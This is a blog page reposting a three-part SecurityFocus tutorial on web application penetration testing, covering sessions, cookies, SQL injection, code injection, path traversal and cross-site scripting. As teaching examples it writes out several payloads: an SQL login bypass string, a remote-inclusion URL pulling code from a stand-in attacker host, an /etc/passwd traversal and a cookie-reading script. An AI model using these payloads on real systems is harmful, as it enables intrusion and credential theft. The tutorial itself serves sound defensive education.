'Hacking'에 해당되는 글 266건

  1. 2011.08.31 Penetration Testing for Web Applications (Part Three) by CEOinIRVINE 1
  2. 2011.08.31 Penetration Testing for Web Applications (Part Two) by CEOinIRVINE
  3. 2011.08.31 Penetration Testing for Web Applications (Part One) by CEOinIRVINE
  4. 2011.08.31 tcpdump by CEOinIRVINE 1
  5. 2011.08.26 MS, AES security by CEOinIRVINE 1
  6. 2011.08.18 Malware URL by CEOinIRVINE
  7. 2011.08.12 Social Networking Security Threats by CEOinIRVINE
  8. 2011.08.09 Jailbreak Apps by CEOinIRVINE 2
  9. 2011.08.05 Wardriving Evolves Into Warflying by CEOinIRVINE
  10. 2011.08.03 IM Server by CEOinIRVINE 1

Penetration Testing for Web Applications (Part Three)

Updated: 02 Nov 2010
Anonymous's picture
00 Votes
Login to vote

by Jody Melbourne and David Jorm

In the first installment of this series we introduced the reader to web application security issues and stressed the significance of input validation. In the second installment, several categories of web application vulnerabilities were discussed and methods for locating these vulnerabilities were outlined. In this third and final article we will be investigating session security issues and cookies, buffer overflows and logic flaws, and providing links to further resources for the web application penetration tester.

Cookies

Cookies are a mechanism for maintaining persistent data on the client side of a HTTP exchange. They are not part of the HTTP specification, but are a de-facto industry standard based on a specification issued by Netscape. Cookies involve the use of HTTP header responses to set values on the client side, and in client requests to provide these values back to the server side. The value is set using a 'Set-Cookie' header and returned using a 'Cookie' header. Take the following example of an exchange of cookies. The client requests a resource, and receives in the headers of the response:

Set-Cookie: PASSWORD=g0d; path=/; expires=Friday, 20-Jul-03 23:23:23 GMT

When the client requests a resource in path "/" on this server, it sends:

Cookie: PASSWORD=g0d

The browser is responsible for storing and retrieving cookie values. In both Netscape and Internet Explorer this is done using small temporary files; the security of these mechanisms is beyond the scope of this article, we are more concerned with the problems with cookies themselves.

Cookies are often used to authenticate users to an application. If the user's cookie is stolen or captured, an attacker can impersonate that user. There have been numerous browser vulnerabilities in the past that allow attackers to steal known cookies -- for more information on client-side cookie security, please refer to the cross-site scripting section in part two of this series.

Cookies should be treated by the developer as another form of user input and be subjected to the same validation routines. There have been numerous examples in the past of SQL injection and other vulnerabilities that are exploitable through manipulating cookie values. Refer to the PHPNuke admin cookie SQL injection, and Webware WebKit cookie overflow vulnerabilities.

Session Security and Session-IDs

Most modern web scripting languages include mechanisms to maintain session state. That is, the ability to establish variables such as access rights and localization settings which will apply to every interaction a user has with the web application until they terminate their session. This is achieved by the web server issuing a pseudo-unique string to the client known as a Session ID. Then the server associates elements of data with this ID, and the client provides the ID with each subsequent request made to the application. Both PHP and ASP have in-built support for sessions, with PHP providing them via GET variables and Cookies, and ASP via Cookies only.

PHP's support for GET variable sessions is considered by all accounts an inferior mechanism, but is provided because not all browsers support cookies and not all users will accept cookies. Using this method, the Session ID is passed via a GET variable named PHPSESSID, provided in the query string of every request made. PHP automatically modifies all links at runtime to add the PHPSESSID to the link URL, thereby persisting state. Not only is this vulnerable to replay attacks (since the Session ID forms part of the URL), it trivializes it -- searching proxy logs, viewing browser histories or social engineering a user to paste you a URL as they see it (containing their Session ID) are all common methods of attack. Combine GET variable sessions with a cross site scripting bug and you have a simple way of forcing the disclosure of the Session ID. This is achieved by injecting javascript code which will post the document URL to a remote logging application, allowing the attacker to simply watch his logging application for the Session IDs to roll in.

The cookie method works in a similar manner, except the PHPSESSID (or Session-ID in the case of ASP) variable is persisted using a cookie rather than a GET variable. At a protocol level, this is just as dangerous as the GET method, as the Session ID can be logged, replayed or socially engineered. It is, however, obfuscated and more difficult to abuse as the Session ID is not embedded in the URL. The combination of cookies, sessions and a cross site scripting bug is just as dangerous, as the attacker need only post the document.cookie property to his logging application to extract the Session ID. Additionally, as a matter of convenience for the user, Session IDs are frequently set using cookies with either no expiry or a virtually infinite expiry date, such as a year from the present. This means that the cookie will always exist at the client side, and the window of opportunity will be indefinitely replayable as the cookie has no expiry date.

There are also many, albeit less common, forms of user session management. One technique is to embed the Session ID string in an <input type="hidden"> tag with a <form> element. Another is to use Session ID strings provided by the Apache webserver for user tracking purposes and as authentication tokens. The Apache project never intended these to be used for anything other than user tracking and statistical purposes and the algorithm is based on concatenation of known data elements on the server side. The details of Session ID bruteforcing and cryptographic hashing algorithms are beyond the scope of this article, but David Endler has provided a good paper on this topic (.pdf) if you are interested in reading more.

Session IDs are very much an Achilles' Heel of web applications, as they are simply tack-ons to maintain state for HTTP -- an essentially stateless technology. The penetration tester should examine in detail the mechanism used to generate Session IDs, how the IDs are being persisted and how this can be combined with client-side bugs (such as cross site scripting) to facilitate replay attacks.

Logic Flaws

Logic flaws are a broad category of vulnerability encompassing most bugs which do not explicitly fall into another category. A logic flaw is a failure in the web application's logic to correctly perform conditional branching or apply security. For example, take the following snippet of PHP code:

 <?php $a=false; $b=true; $c=false; if ($b && $c || $a && $c || $b) 	echo "True"; else 	echo "False"; ?> 

The above code is attempting to ensure that two out of the three variables are set before returning true. The logic flaw exists in that, given the operator precedence present in PHP, simply having $b equal to true will cause the if statement to succeed. This can be patched by replacing the if statement with either of the following:

 if ($b && $c || $a && ($c || $b)) if ($b && $c || $a && $c || $a && $b) 

Logic flaws are difficult to identify from a blackbox testing perspective, and they more commonly make themselves apparent as a result of testing for another kind of vulnerability. A comprehensive code audit where the conditional branching logic is reviewed for adherence to program specification is the most effective way to trap logic flaws. An example of a logic flaw issue is the SudBox Boutique login bypass vulnerability.

Binary Attacks

Web applications developed in a language that employs static buffers (such as C/C++) may be vulnerable to traditional binary attacks such as format string bugs and buffer overflows. Although code and content manipulation issues (such as SQL and PHP code injection) are more common, there have been numerous cases in the past of popular web applications with overflow vulnerabilities.

A buffer overflow occurs when a program attempts to store more data in a static buffer than intended. The additional data overwrites and corrupts adjacent blocks of memory, and can allow an attacker to take control of the flow of execution and inject arbitrary instructions. Overflow vulnerabilities are more commonly found in applications developed in the C/C++ language; newer languages such as C# provide additional stack protection for the careless developer. Recent examples of overflows in web applications include mnoGoSearch and Oracle E-Business Suite.

Buffer overflows can often be located through black-box testing by feeding increasingly larger values into form inputs, header and cookie fields. In the case of ISAPI applications, a 500 error message (or time-out) in response to a large input may indicate a segmentation fault at the server side. The environment should first be fingerprinted to determine if the development language is prone to overflow attacks as overflows are more common to compiled executables than scripted applications. Note that most of the popular web development languages (Java, PHP, Perl, Python) are interpreted languages in which the interpreter handles all memory allocation.

Format string attacks occur when certain C functions process inputs containing formatting characters (%). The printf/fprint/sprintf, syslog() and setproctitle() functions are known to misbehave when dealing with formatting characters. In some cases, format string bugs can lead to an attacker gaining control over the flow of execution of a program. Refer to the PWC.CGI vulnerability for an example of this type of exploit in a web application.

Useful Testing Tools

A number of applications have been developed to assist the blackbox tester with locating web application vulnerabilities. While analysis of programmatic output is probably best accomplished by hand, a large portion of the blackbox testing methodology can be scripted and automated.

AtStake WebProxy

WebProxy sits between the client browser and the web application, capturing and decoding requests to allow the developer to analyze user interactions, study exploit techniques, and manipulate requests on-the-fly.

Home Page: http://www.atstake.com/webproxy

SPIKE Proxy

SPIKE proxy functions as a HTTP/HTTPS proxy and allows the blackbox tester to automate a number of web application vulnerability tests (including SQL injection, directory traversal and brute force attacks).

Home Page: http://www.immunitysec.com/spike.html

WebserverFP

WebserverFP is a HTTPD fingerprinting tool that uses values and formatting within server responses to determine the web server software in use.

Home Page: http://www.astralclinic.com

KSES

KSES is a HTML security filter written in PHP. It filters all 'nasty' HTML elements and helps to prevent input validation issues such as XSS and SQL injection attacks.

Home Page: http://sourceforge.net/projects/kses

Mieliekoek.pl

This tool, written by roelof@sensepost.com, will crawl through a collection of pages and scripts searching for potential SQL injection issues.

Download: http://www.securityfocus.com/archive/101/257713

Sleuth

Sleuth is a commercial application for locating web application security vulnerabilities. It includes intercept proxy and web-spider features.

Home Page: http://www.sandsprite.com/Sleuth

Webgoat

The OWASP Webgoat project aims to create an interactive learning environment for web application security. It teaches developers, using practical exercises, the most common web application security and design flaws. It is written in Java and installers are available for both *nix and Win32 systems.

Home Page: http://www.owasp.org/development/webgoat

AppScan

AppScan is a commercial web application security testing tool developed by Sanctum Inc. It includes features such as code sanitation, offline analysis, and automated scan scheduling.

Home Page: http://www.sanctuminc.com/solutions/appscan/index.html

Conclusion

Web applications are becoming the standard for client-server communications over the Internet. As more and more applications are 'web enabled', the number of web application security issues will increase; traditional local system vulnerabilities, such as directory traversals, overflows and race conditions, are opened up to new vectors of attack. The responsibility for the security of sensitive systems will rest increasingly with the web developer, rather than the vendor or system administrator.

In this series of articles we hope to have stressed the importance of user input validation and have demonstrated how all major web application security issues relate back to this concept. The best defense against input-manipulation attacks is to treat all input with a healthy dose of paranoia and the notion of "if not explicitly allowed, deny." Dealing with user complaints about non-permitted characters is always going to be less painful than a security incident stemming from unfiltered input.

Author Credit

View more articles by Jody Melbourne and David Jorm on SecurityFocus.


'Hacking' 카테고리의 다른 글

SYN Flooding 공격이란?  (1) 2011.08.31
DDOS 대비 방법  (1) 2011.08.31
Penetration Testing for Web Applications (Part Two)  (0) 2011.08.31
Penetration Testing for Web Applications (Part One)  (0) 2011.08.31
tcpdump  (1) 2011.08.31
Posted by CEOinIRVINE
l

Penetration Testing for Web Applications (Part Two)

Updated: 02 Nov 2010
Anonymous's picture
00 Votes
Login to vote

by Jody Melbourne and David Jorm

Our first article in this series covered user interaction with Web applications and explored the various methods of HTTP input that are most commonly utilized by developers. In this second installment we will be expanding upon issues of input validation - how developers routinely, through a lack of proper input sanity and validity checking, expose their back-end systems to server-side code-injection and SQL-injection attacks. We will also investigate the client-side problems associated with poor input-validation such as cross-site scripting attacks.

The Blackbox Testing Method

The blackbox testing method is a technique for hardening and penetration-testing Web applications where the source code to the application is not available to the tester. It forces the penetration tester to look at the Web application from a user's perspective (and therefore, an attacker's perspective). The blackbox tester uses fingerprinting methods (as discussed in Part One of this series) to probe the application and identify all expected inputs and interactions from the user. The blackbox tester, at first, tries to get a 'feel' for the application and learn its expected behavior. The term blackbox refers to this Input/UnknownProcess/Output approach to penetration testing.

The tester attempts to elicit exception conditions and anomalous behavior from the Web application by manipulating the identified inputs - using special characters, white space, SQL keywords, oversized requests, and so forth. Any unexpected reaction from the Web application is noted and investigated. This may take the form of scripting error messages (possibly with snippets of code), server errors (HTTP 500), or half-loaded pages.

Figure 1 - Blackbox testing GET variables
Figure 1 - Blackbox testing GET variables

Any strange behavior on the part of the application, in response to strange inputs, is certainly worth investigating as it may mean the developer has failed to validate inputs correctly!

SQL Injection Vulnerabilities

Many Web application developers (regardless of the environment) do not properly strip user input of potentially "nasty" characters before using that input directly in SQL queries. Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use subselects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shell commands on the underlying operating system.

Locating SQL Injection Vulnerabilities

Often the most effective method of locating SQL injection vulnerabilities is by hand - studying application inputs and inserting special characters. With many of the popular backends, informative errors pages are displayed by default, which can often give clues to the SQL query in use: when attempting SQL injection attacks, you want to learn as much as possible about the syntax of database queries.

Figure 2 - Potential SQL injection vulnerability
Figure 2 - Potential SQL injection vulnerability

Figure 3 - Another potential SQL injection hole
Figure 3 - Another potential SQL injection hole

Example: Authentication bypass using SQL injection

This is one of the most commonly used examples of an SQL injection vulnerability, as it is easy to understand for non-SQL-developers and highlights the extent and severity of these vulnerabilities. One of the simplest ways to validate a user on a Web site is by providing them with a form, which prompts for a username and password. When the form is submitted to the login script (eg. login.asp), the username and password fields are used as variables within an SQL query.

Examine the following code (using MS Access DB as our backend):

  user = Request.form("user")  pass = Request.form("pass")  Set Conn = Server.CreateObject("ADODB.Connection")  Set Rs = Server.CreateObject("ADODB.Recordset")  Conn.Open (dsn)  SQL = "SELECT C=COUNT(*) FROM users where pass='" & pass & "' and user='" & user & "'"    rs.open (sql,conn)  if rs.eof or rs.bof then   response.write "Database Error"  else    if rs("C") < 1 then     response.write "Invalid Credentials"    else     response.write "Logged In"    end if  end if 

In this scenario, no sanity or validity checking is being performed on the user and pass variables from our form inputs. The developer may have client-side (eg. Javascript) checks on the inputs, but as has been demonstrated in the first part of this series, any attacker who understands HTML can bypass these restrictions. If the attacker were to submit the following credentials to our login script:

user: test' OR '1'='1
pass: test

the resulting SQL query would look as follows:

SELECT * FROM users where pass='test' and user='test' OR '1' = '1'

In plain English, "access some data where user and pass are equal to 'test', or 1 is equal to 1." As the second condition is always true, the first condition is irrelevant, and the query data is returned successfully - in this case, logging the attacker into the application.

For recent examples of this class of vulnerability, please refer to http://www.securityfocus.com/bid/4520 and http://www.securityfocus.com/bid/4931. Both of these advisories detail SQL authentication issues similar to the above.

MS-SQL Extended stored procedures

Microsoft SQL Server 7 supports the loading of extended stored procedures (a procedure implemented in a DLL that is called by the application at runtime). Extended stored procedures can be used in the same manner as database stored procedures, and are usually employed to perform tasks related to the interaction of the SQL server with its underlying Win32 environment. MSSQL has a number of built-in XSPs - most of these stored procedures are prefixed with an xp_.

Some of the built-in functions useful to the MSSQL pen-tester:

* xp_cmdshell - execute shell commands
* xp_enumgroups - enumerate NT user groups
* xp_logininfo - current login info
* xp_grantlogin - grant login rights
* xp_getnetname - returns WINS server name
* xp_regdeletekey - registry manipulation
* xp_regenumvalues
* xp_regread
* xp_regwrite
* xp_msver - SQL server version info

A non-hardened MS-SQL server may allow the DBO user to access these potentially dangerous stored procedures (which are executed with the permissions of the SQL server instance - in many cases, with SYSTEM privileges).

There are many extended/stored procedures that should not be accessible to any user other than the DB owner. A comprehensive list can be found at MSDN: http://msdn.microsoft.com/library/default.asp?url=/library/en-us/tsqlref/ts_sp_00_519s.asp

A well-maintained guide to hardening MS-SQL Server 7 and 2000 can be found at SQLSecurity.com: http://www.sqlsecurity.com/DesktopDefault.aspx?tabindex=3&tabid=4

PHP and MySQL Injection

A vulnerable PHP Web application with a MySQL backend, despite PHP escaping numerous 'special' characters (with Magic_Quotes enabled), can be manipulated in a similar manner to the above ASP application. MySQL does not allow for direct shell execution like MSSQL's xp_cmdshell, however in many cases it is still possible for the attacker to append arbitrary conditions to queries, or use UNIONs and subselects to access or modify records in the database.

For more information on PHP/MySQL security issues, refer to http://www.phpadvisory.com. PHP/Mysql security issues are on the increase - reference phpMyshop (http://www.securityfocus.com/bid/6746) and PHPNuke (http://www.securityfocus.com/bid/7194) advisories.

Code and Content Injection

What is code injection? Code injection vulnerabilities occur where the output or content served from a Web application can be manipulated in such a way that it triggers server-side code execution. In some poorly written Web applications that allow users to modify server-side files (such as by posting to a message board or guestbook) it is sometimes possible to inject code in the scripting language of the application itself.

This vulnerability hinges upon the manner in which the application loads and passes through the contents of these manipulated files - if this is done before the scripting language is parsed and executed, the user-modified content may also be subject to parsing and execution.

Example: A simple message board in PHP

The following snippet of PHP code is used to display posts for a particular message board. It retrieves the messageid GET variable from the user and opens a file $messageid.txt under /var/www/forum:

 <?php 	include('/var/www/template/header.inc'); 	if (isset($_GET['messageid']) && file_exists('/var/www/forum/' . stripslashes($messageid) . '.txt') && 	is_numeric($messageid)) { 		include('/var/www/forum/' . stripslashes($messageid) . '.txt'); 	} else { 		include('/var/www/template/error.inc'); 	} 	include('/var/www/template/footer.inc'); ?> 

Although the is_numeric() test prevents the user from entering a file path as the messageid, the content of the message file is not checked in any way. (The problem with allowing unchecked entry of file paths is explained later) If the message contained PHP code, it would be include()'d and therefore executed by the server.

A simple method of exploiting this example vulnerability would be to post to the message board a simple chunk of code in the language of the application (PHP in this example), then view the post and see if the output indicates the code has been executed.

Server Side Includes (SSI)

SSI is a mechanism for including files using a special form of HTML comment which predates the include functionality of modern scripting languages such as PHP and JSP. Older CGI programs and 'classic' ASP scripts still use SSI to include libraries of code or re-usable elements of content, such as a site template header and footer. SSI is interpreted by the Web server, not the scripting language, so if SSI tags can be injected at the time of script execution these will often be accepted and parsed by the Web server. Methods of attacking this vulnerability are similar to those shown above for scripting language injection. SSI is rapidly becoming outmoded and disused, so this topic will not be covered in any more detail.

Miscellaneous Injection

There are many other kinds of injection attacks common amongst Web applications. Since a Web application primarily relies upon the contents of headers, cookies and GET/POST variables as input, the actions performed by the application that is driven by these variables must be thoroughly examined. There is a potentially limitless scope of actions a Web application may perform using these variables: open files, search databases, interface with other command systems and, as is increasingly common in the Web services world, interface with other Web applications. Each of these actions requires its own syntax and requires that input variables be sanity-checked and validated in a unique manner.

For example, as we have seen with SQL injection, SQL special characters and keywords must be stripped. But what about a Web application that opens a serial port and logs information remotely via a modem? Could the user input a modem command escape string, cause the modem to hangup and redial other numbers? This is merely one example of the concept of injection. The critical point for the penetration tester is to understand what the Web application is doing in the background - the function calls and commands it is executing - and whether the arguments to these calls or strings of commands can be manipulated via headers, cookies and GET/POST variables.

Example: PHP fopen()

As a real world example, take the widespread PHP fopen() issue. PHP's file-open fopen() function allows for URLs to be entered in the place of a filename, simplifying access to Web services and remote resources. We will use a simple portal page as an example:

URL: http://www.example.com/index.php?file=main

 <?php 	include('/var/www/template/header.inc'); 	if (isset($_GET['file']) { 		$fp = fopen("$file" . ".html","r"); 	} else { 		$fp = fopen("main.html", "r"); 	} 	include('/var/www/template/footer.inc'); ?> 

The index.php script includes header and footer code, and fopen()'s the page indicated by the file GET variable. If no file variable is set, it defaults to main.html. The developer is forcing a file extension of .html, but is not specifying a directory prefix. A PHP developer inspecting this code should notice immediately that it is vulnerable to a directory traversal attack, as long as the filename requested ends in .html (See below).

However, due to fopen()'s URL handling features, an attacker in this case could submit:

http://www.example.com/index.php?file=http://www.hackersite.com/main

This would force the example application to fopen() the file main.html at www.hackersite.com. If this file were to contain PHP code, it would be incorporated into the output of the index.php application, and would therefore be executed by the server. In this manner, an attacker is able to inject arbitrary PHP code into the output of the Web application, and force server-side execution of the code of his/her choosing.

W-Agora forum was recently found to have such a vulnerability in its handling of user inputs that could result in fopen() attacks - refer to http://www.securityfocus.com/bid/6463 for more details. This is a perfect example of this particular class of vulnerability.

Many skilled Web application developers are aware of current issues such as SQL injection and will use the many sanity-checking functions and command-stripping mechanisms available. However, once less common command systems and protocols become involved, sanity-checking is often flawed or inadequate due to a lack of comprehension of the wider issues of input validation.

Path Traversal and URIs

A common use of Web applications is to act as a wrapper for files of Web content, opening them and returning them wrapped in chunks of HTML. This can be seen in the above sample for code injection. Once again, sanity checking is the key. If the variable being read in to specify the file to be wrapped is not checked, a relative path can be entered.

Copying from our misc. code injection example, if the developer were to fail to specify a file suffix with fopen():

fopen("$file" , "r");

...the attacker would be able to traverse to any file readable by the Web application.

http://www.example.com/index.php?file=../../../../etc/passwd

This request would return the contents of /etc/passwd unless additional stripping of the path character (/.) had been performed on the file variable.

This problem is compounded by the automatic handling of URIs by many modern Web scripting technologies, including PHP, Java and Microsoft's .NET. If this is supported on the target environment, vulnerable applications can be used as an open relay or proxy:

http://www.example.com/index.php?file=http://www.google.com/

This flaw is one of the easiest security issues to spot and rectify, although it remains common on smaller sites whose application code performs basic content wrapping. The problem can be mitigated in two ways. First, by implementing an internal numeric index to the documents or, as in our message board code, using files named in numeric sequence with a static prefix and suffix. Second, by stripping any path characters such as [/\.] which attackers could use to access resources outside of the application's directory tree.

Cross Site Scripting

Cross Site Scripting attacks (a form of content-injection attack) differs from the many other attack methods covered in this article in that it affects the client-side of the application (ie. the user's browser). Cross Site Scripting (XSS) occurs wherever a developer incorrectly allows a user to manipulate HTML output from the application - this may be in the result of a search query, or any other output from the application where the user's input is displayed back to the user without any stripping of HTML content.

A simple example of XSS can be seen in the following URL:

http://server.example.com/browse.cfm?categoryID=1&name=Books

In this example the content of the 'name' parameter is displayed on the returned page. A user could submit the following request:

http://server.example.com/browse.cfm?categoryID=1&name=<h1>Books

If the characters < > are not being correctly stripped or escaped by this application, the "<h1>" would be returned within the page and would be parsed by the browser as valid html. A better example would be as follows:

http://server.example.com/browse.cfm?categoryID=1&name=<script>alert(document.cookie);</script>

In this case, we have managed to inject Javascript into the resulting page. The relevant cookie (if any) for this session would be displayed in a popup box upon submitting this request.

This can be abused in a number of ways, depending on the intentions of the attacker. A short piece of Javascript to submit a user's cookie to an arbitrary site could be placed into this URL. The request could then be hex-encoded and sent to another user, in the hope that they open the URL. Upon clicking the trusted link, the user's cookie would be submitted to the external site. If the original site relies on cookies alone for authentication, the user's account would be compromised. We will be covering cookies in more detail in part three of this series.

In most cases, XSS would only be attempted from a reputable or widely-used site, as a user is more likely to click on a long, encoded URL if the server domain name is trusted. This kind of attack does not allow for any access to the client beyond that of the affected domain (in the user's browser security settings).

For more details on Cross-Site scripting and it's potential for abuse, please refer to the CGISecurity XSS FAQ at http://www.cgisecurity.com/articles/xss-faq.shtml.

Conclusion

In this article we have attempted to provide the penetration tester with a good understanding of the issue of input validation. Each of the subtopics covered in this article are deep and complex issues, and could well require a series of their own to cover in detail. The reader is encouraged to explore the documents and sites that we have referenced for further information.

The final part of this series will discuss in more detail the concepts of sessions and cookies - how Web application authentication mechanisms can be manipulated and bypassed. We will also explore the issue of traditional attacks (such as overflows and logic bugs) that have plagued developers for years, and are still quite common in the Web applications world.

This article originally appeared on SecurityFocus.com -- reproduction in whole or in part is not allowed without expressed written consent.

'Hacking' 카테고리의 다른 글

DDOS 대비 방법  (1) 2011.08.31
Penetration Testing for Web Applications (Part Three)  (1) 2011.08.31
Penetration Testing for Web Applications (Part One)  (0) 2011.08.31
tcpdump  (1) 2011.08.31
MS, AES security  (1) 2011.08.26
Posted by CEOinIRVINE
l

This is the first in a series of three articles on penetration testing for Web applications. The first installment provides the penetration tester with an overview of Web applications - how they work, how they interact with users, and most importantly how developers can expose data and systems with poorly written and secured Web application front-ends.

Note: It is assumed that the reader of this article has some knowledge of the HTTP protocol - specifically, the format of HTTP GET and POST requests, and the purpose of various header fields. This information is available in RFC2616.

Web applications are becoming more prevalent and increasingly more sophisticated, and as such they are critical to almost all major online businesses. As with most security issues involving client/server communications, Web application vulnerabilities generally stem from improper handling of client requests and/or a lack of input validation checking on the part of the developer.

The very nature of Web applications - their ability to collate, process and disseminate information over the Internet - exposes them in two ways. First and most obviously, they have total exposure by nature of being publicly accessible. This makes security through obscurity impossible and heightens the requirement for hardened code. Second and most critically from a penetration testing perspective, they process data elements from within HTTP requests - a protocol that can employ a myriad of encoding and encapsulation techniques.

Most Web application environments (including ASP and PHP, which will both be used for examples throughout the series), expose these data elements to the developer in a manner that fails to identify how they were captured and hence what kind of validation and sanity checking should apply to them. Because the Web "environment" is so diverse and contains so many forms of programmatic content, input validation and sanity checking is the key to Web applications security. This involves both identifying and enforcing the valid domain of every user-definable data element, as well as a sufficient understanding of the source of all data elements to determine what is potentially user definable.

The Root of the Issue: Input Validation

Input validation issues can be difficult to locate in a large codebase with lots of user interactions, which is the main reason that developers employ penetration testing methodologies to expose these problems. Web applications are, however, not immune to the more traditional forms of attack. Poor authentication mechanisms, logic flaws, unintentional disclosure of content and environment information, and traditional binary application flaws (such as buffer overflows) are rife. When approaching a Web application as a penetration tester, all this must be taken into account, and a methodical process of input/output or "blackbox" testing, in addition to (if possible) code auditing or "whitebox" testing, must be applied.

What exactly is a Web application?

A Web application is an application, generally comprised of a collection of scripts, that reside on a Web server and interact with databases or other sources of dynamic content. They are fast becoming ubiquitous as they allow service providers and their clients to share and manipulate information in an (often) platform-independent manner via the infrastructure of the Internet. Some examples of Web applications include search engines, Webmail, shopping carts and portal systems.

How does it look from the users perspective?

Web applications typically interact with the user via FORM elements and GET or POST variables (even a 'Click Here' button is usually a FORM submission). With GET variables, the inputs to the application can be seen within the URL itself, however with POST requests it is often necessary to study the source of form-input pages (or capture and decode valid requests) in order to determine the users inputs.

An example HTTP request that might be provided to a typical Web application is as follows:

GET /sample.php?var=value&var2=value2 HTTP/1.1 | HTTP-METHOD REQUEST-URI PROTOCOL/VERSION
Session-ID: 361873127da673c | Session-ID Header
Host: www.webserver.com | Host Header
<CR><LF><CR><LF> | Two carriage return line feeds

Every element of this request can potentially be used by the Web application processing the request. The REQUEST-URI identifies the unit of code that will be invoked along with the query string: a separated list of &variable=value pairs defining input parameters. This is the main form of Web applications input. The Session-ID header provides a token identifying the client's established session as a primitive form of authentication. The Host header is used to distinguish between virtual hosts sharing the same IP address and will typically be parsed by the Web server, but is, in theory, within the domain of the Web application.

As a penetration tester you must use all input methods available to you in order to elicit exception conditions from the application. Thus, you cannot be limited to what a browser or automatic tools provide. It is quite simple to script HTTP requests using utilities like curl, or shell scripts using netcat. The process of exhaustive blackbox testing a Web application is one that involves exploring each data element, determining the expected input, manipulating or otherwise corrupting this input, and analysing the output of the application for any unexpected behaviour.

The Information Gathering Phase

Fingerprinting the Web Application Environment

One of the first steps of the penetration test should be to identify the Web application environment, including the scripting language and Web server software in use, and the operating system of the target server. All of these crucial details are simple to obtain from a typical Web application server through the following steps:

  1. Investigate the output from HEAD and OPTIONS http requests

    The header and any page returned from a HEAD or OPTIONS request will usually contain a SERVER: string or similar detailing the Web server software version and possibly the scripting environment or operating system in use.

    OPTIONS / HTTP/1.0

    HTTP/1.1 200 OK
    Server: Microsoft-IIS/5.0
    Date: Wed, 04 Jun 2003 11:02:45 GMT
    MS-Author-Via: DAV
    Content-Length: 0
    Accept-Ranges: none
    DASL: <DAV:sql>
    DAV: 1, 2
    Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
    Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
    Cache-Control: private

  2. Investigate the format and wording of 404/other error pages

    Some application environments (such as ColdFusion) have customized and therefore easily recognizable error pages, and will often give away the software versions of the scripting language in use. The tester should deliberately request invalid pages and utilize alternate request methods (POST/PUT/Other) in order to glean this information from the server.

    Below is an example of a ColdFusion 404 error page:

    ColdFusion 404 error page

  3. Test for recognised file types/extensions/directories

    Many Web services (such as Microsoft IIS) will react differently to a request for a known and supported file extension than an unknown extension. The tester should attempt to request common file extensions such as .ASP, .HTM, .PHP, .EXE and watch for any unusual output or error codes.

    GET /blah.idq HTTP/1.0

    HTTP/1.1 200 OK
    Server: Microsoft-IIS/5.0
    Date: Wed, 04 Jun 2003 11:12:24 GMT
    Content-Type: text/html

    <HTML>The IDQ file blah.idq could not be found.

  4. Examine source of available pages

    The source code from the immediately accessible pages of the application front-end may give clues as to the underlying application environment.

    <title>Home Page</title>
    <meta content="Microsoft Visual Studio 7.0" name="GENERATOR">
    <meta content="C#" name="CODE_LANGUAGE">
    <meta content="JavaScript" name="vs_defaultClientScript">

    In this situation, the developer appears to be using MS Visual Studio 7. The underlying environment is likely to be Microsoft IIS 5.0 with .NET framework.

  5. Manipulate inputs in order to elicit a scripting error

    In the example below the most obvious variable (ItemID) has been manipulated to fingerprint the Web application environment:

    ItemID manipulation in a URL

  6. TCP/ICMP and Service Fingerprinting Using traditional fingerprinting tools such as Nmap and Queso, or the more recent application fingerprinting tools Amap and WebServerFP, the penetration tester can gain a more accurate idea of the underlying operating systems and Web application environment than through many other methods. NMAP and Queso examine the nature of the host's TCP/IP implementation to determine the operating system and, in some cases, the kernel version and patch level. Application fingerprinting tools rely on data such as Server HTTP headers to identify the host's application software.

Hidden form elements and source disclosure

In many cases developers require inputs from the client that should be protected from manipulation, such as a user-variable that is dynamically generated and served to the client, and required in subsequent requests. In order to prevent users from seeing and possibly manipulating these inputs, developers use form elements with a HIDDEN tag. Unfortunately, this data is in fact only hidden from view on the rendered version of the page - not within the source.

There have been numerous examples of poorly written ordering systems that would allow users to save a local copy of order confirmation pages, edit HIDDEN variables such as price and delivery costs, and resubmit their request. The Web application would perform no further authentication or cross-checking of form submissions, and the order would be dispatched at a discounted price!

<FORM METHOD="LINK" ACTION="/shop/checkout.htm">
<INPUT TYPE="HIDDEN" name="quoteprice" value="4.25">Quantity: <INPUT TYPE="text"
NAME="totalnum"> <INPUT TYPE="submit" VALUE="Checkout">
</FORM>

This practice is still common on many sites, though to a lesser degree. Typically only non-sensitive information is contained in HIDDEN fields, or the data in these fields is encrypted. Regardless of the sensitivity of these fields, they are still another input to be manipulated by the blackbox penetration tester.

All source pages should be examined (where feasible) to determine if any sensitive or useful information has been inadvertently disclosed by the developer - this may take the form of active content source within HTML, pointers to included or linked scripts and content, or poor file/directory permissions on critical source files. Any referenced executables and scripts should be probed, and if accessible, examined.

Javascript and other client-side code can also provide many clues as to the inner workings of a Web application. This is critical information when blackbox testing. Although the whitebox (or 'code-auditing') tester has access to the application's logic, to the blackbox tester this information is a luxury which can provide for further avenues of attack. For example, take the following chunk of code:

<INPUT TYPE="SUBMIT" onClick="
if (document.forms['product'].elements['quantity'].value >= 255) {
document.forms['product'].elements['quantity'].value='';
alert('Invalid quantity');
return false;
} else {
return true;
}
">

This suggests that the application is trying to protect the form handler from quantity values of 255 of more - the maximum value of a tinyint field in most database systems. It would be trivial to bypass this piece of client-side validation, insert a long integer value into the 'quantity' GET/POST variable and see if this elicits an exception condition from the application.

Determining Authentication Mechanisms

One of the biggest shortcomings of the Web applications environment is its failure to provide a strong authentication mechanism. Of even more concern is the frequent failure of developers to apply what mechanisms are available effectively. It should be explained at this point that the term Web applications environment refers to the set of protocols, languages and formats - HTTP, HTTPS, HTML, CSS, JavaScript, etc. - that are used as a platform for the construction of Web applications. HTTP provides two forms of authentication: Basic and Digest. These are both implemented as a series of HTTP requests and responses, in which the client requests a resource, the server demands authentication and the client repeats the request with authentication credentials. The difference is that Basic authentication is clear text and Digest authentication encrypts the credentials using a nonce (time sensitive hash value) provided by the server as a cryptographic key.

